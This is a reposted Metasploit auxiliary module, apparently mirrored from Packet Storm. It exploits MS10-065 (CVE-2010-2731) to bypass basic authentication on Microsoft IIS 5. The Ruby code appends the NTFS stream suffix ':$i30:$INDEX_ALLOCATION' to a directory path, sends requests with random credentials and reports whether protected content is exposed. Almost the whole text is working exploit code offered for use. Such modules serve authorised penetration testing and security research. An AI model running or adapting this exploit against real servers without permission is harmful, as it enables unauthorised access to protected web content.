MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass

MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
2024-9-1 05:41:4 Author: packetstormsecurity.com(查看原文) 阅读量:5 收藏

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
        'Description' => %q{
          This module bypasses basic authentication for Internet Information Services (IIS).
          By appending the NTFS stream name to the directory name in a request, it is
          possible to bypass authentication.
        },
        'References' => [
          [ 'CVE', '2010-2731' ],
          [ 'OSVDB', '66160' ],
          [ 'MSB', 'MS10-065' ],
          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
        ],
        'Author' => [
          'Soroush Dalili',
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2010-07-02'
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])
      ]
    )
  end
  def has_auth
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET'
    })
    vprint_status(res.body) if res
    return (res and res.code == 401)
  end
  def try_auth
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"
    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'
    user = Rex::Text.rand_text_alpha(rand(5..14))
    pass = Rex::Text.rand_text_alpha(rand(5..14))
    vprint_status("Requesting: #{dir}")
    res = send_request_cgi({
      'uri' => dir,
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })
    vprint_status(res.body) if res
    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''
  end
  def run
    if !has_auth
      print_error('No basic authentication enabled')
      return
    end
    bypass_string = try_auth
    if bypass_string.empty?
      print_error('The bypass attempt did not work')
    else
      print_good("You can bypass auth by doing: #{bypass_string}")
    end
  end
end

文章来源: https://packetstormsecurity.com/files/180857/iis_auth_bypass.rb.txt
如有侵权请联系:admin#unsafe.sh